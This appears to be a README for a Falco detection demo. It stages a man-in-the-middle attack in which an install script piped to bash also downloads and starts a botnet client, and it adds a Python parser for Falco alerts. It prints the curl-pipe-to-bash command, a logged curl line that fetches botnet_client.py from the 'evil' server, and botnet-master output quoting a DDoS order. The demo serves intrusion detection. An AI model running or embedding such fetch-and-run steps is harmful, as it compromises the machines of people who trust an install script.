falco/examples/mitm-sh-installer

Demo of falco with man-in-the-middle attacks on installation scripts

For context, see the corresponding blog post for this demo.

Demo architecture

Initial setup

Make sure no prior botnet_client.py processes are lying around.

Start everything using docker-compose

From this directory, run the following:

$ docker-compose -f demo.yml up

This starts the following containers:

  • apache: the legitimate web server, serving files from .../mitm-sh-installer/web_root, specifically the file install-software.sh.
  • nginx: the reverse proxy, configured with the config file .../mitm-sh-installer/nginx.conf.
  • evil_apache: the "evil" web server, serving files from .../mitm-sh-installer/evil_web_root, specifically the file botnet_client.py.
  • attacker_botnet_master: constantly trying to contact the botnet_client.py process.
  • falco: will detect the activities of botnet_client.py.

Download install-software.sh, see botnet client running

Run the following to fetch and execute the installation script, which also installs the botnet client:

$ curl http://localhost/install-software.sh | bash

You'll see messages about installing the software. (The script doesn't actually install anything; the messages are just for demonstration purposes.)

Now look for all python processes and you'll see the botnet client running. You can also telnet to port 1234:

$ ps auxww  | grep python
...
root   19983  0.1  0.4  33992  8832 pts/1    S    13:34   0:00 python ./botnet_client.py

$ telnet localhost 1234
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

You'll also see messages in the docker-compose output showing that attacker_botnet_master can reach the client:

attacker_botnet_master | Trying to contact compromised machine...
attacker_botnet_master | Waiting for botnet command and control commands...
attacker_botnet_master | Ok, will execute "ddos target=10.2.4.5 duration=3000s rate=5000 m/sec"
attacker_botnet_master | **********Contacted compromised machine, sent botnet commands

At this point, kill the botnet_client.py process to clean things up.

Run installation script again using fbash, note falco warnings.

If you run the installation script again:

$ curl http://localhost/install-software.sh | ./fbash

In the docker-compose output, you'll see the following falco warnings:

falco                  | 23:19:56.528652447: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=127.0.0.1:43639->127.0.0.1:9090)
falco                  | 23:19:56.528667589: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=)
falco                  | 23:19:56.530758087: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=::1:41996->::1:9090)
falco                  | 23:19:56.605318716: Warning Unexpected listen call by a process in a fbash session (command=python ./botnet_client.py)
falco                  | 23:19:56.605323967: Warning Unexpected listen call by a process in a fbash session (command=python ./botnet_client.py)
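When this demo is run for real, the falco lines are interleaved with output from the other four services, so it helps to have something that pulls the falco alerts out of the docker-compose stream and reduces them to the rule that fired, the flagged command, and the connection. The following Python is an added example, not part of this demo or of falco itself; the sample lines are copied from the docker-compose output above, while the regular expressions are an assumption about the text layout of that output (service name, `|`, timestamp, priority, rule text, then parenthesised `key=value` fields) rather than a falco API. It keeps the empty `connection=` field seen in the second alert as an empty string and collapses the two "Unexpected listen call" alerts, which differ only in timestamp, into one.

```python
import re
from collections import Counter

# Constructed sample: falco and attacker lines as they appear in the
# docker-compose output of this demo.
SAMPLE_OUTPUT = """\
attacker_botnet_master | Trying to contact compromised machine...
falco                  | 23:19:56.528652447: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=127.0.0.1:43639->127.0.0.1:9090)
falco                  | 23:19:56.528667589: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=)
falco                  | 23:19:56.530758087: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=::1:41996->::1:9090)
falco                  | 23:19:56.605318716: Warning Unexpected listen call by a process in a fbash session (command=python ./botnet_client.py)
falco                  | 23:19:56.605323967: Warning Unexpected listen call by a process in a fbash session (command=python ./botnet_client.py)
"""

# Assumed line layout: "<service> | <HH:MM:SS.ns>: <priority> <rule text> (<fields>)".
# The rule text itself may contain parentheses ("non-http(s)"), so the fields
# group is restricted to the trailing parenthesised run without nested parens.
LINE_RE = re.compile(
    r"^(?P<service>\S+)\s*\|\s*"
    r"(?P<time>\d{2}:\d{2}:\d{2}\.\d+):\s+"
    r"(?P<priority>\w+)\s+"
    r"(?P<rule>.*?)\s*\((?P<fields>[^()]*)\)\s*$"
)

# "key=value" pairs; a value runs until the next " key=" or end of string,
# so commands with spaces and an empty "connection=" both parse correctly.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")


def parse_falco_alerts(text):
    """Return one dict per falco alert line; lines from other services are skipped."""
    alerts = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group("service") != "falco":
            continue
        fields = dict(FIELD_RE.findall(m.group("fields")))
        alerts.append({
            "time": m.group("time"),
            "priority": m.group("priority"),
            "rule": m.group("rule"),
            "fields": fields,
        })
    return alerts


def summarize(alerts):
    """Count alerts per rule text and list the distinct commands that were flagged."""
    by_rule = Counter(a["rule"] for a in alerts)
    commands = sorted({a["fields"].get("command", "") for a in alerts})
    return by_rule, commands


def dedupe(alerts):
    """Drop alerts that repeat an earlier one in everything but the timestamp."""
    seen = set()
    unique = []
    for a in alerts:
        key = (a["rule"], tuple(sorted(a["fields"].items())))
        if key in seen:
            continue
        seen.add(key)
        unique.append(a)
    return unique


if __name__ == "__main__":
    alerts = parse_falco_alerts(SAMPLE_OUTPUT)
    by_rule, commands = summarize(alerts)
    for rule, count in by_rule.items():
        print(f"{count}x {rule}")
    print("flagged commands:", commands)
    for a in dedupe(alerts):
        print(a["time"], a["rule"], a["fields"])
```

To use it on a live run, pipe the compose output into a file (`docker-compose -f demo.yml up > demo.log`) and call `parse_falco_alerts(open("demo.log").read())`. The summary makes the two-stage story of the detection visible at a glance: the download of botnet_client.py over a non-http(s) port, then the listen call by the python process it spawned, both attributed to the fbash session.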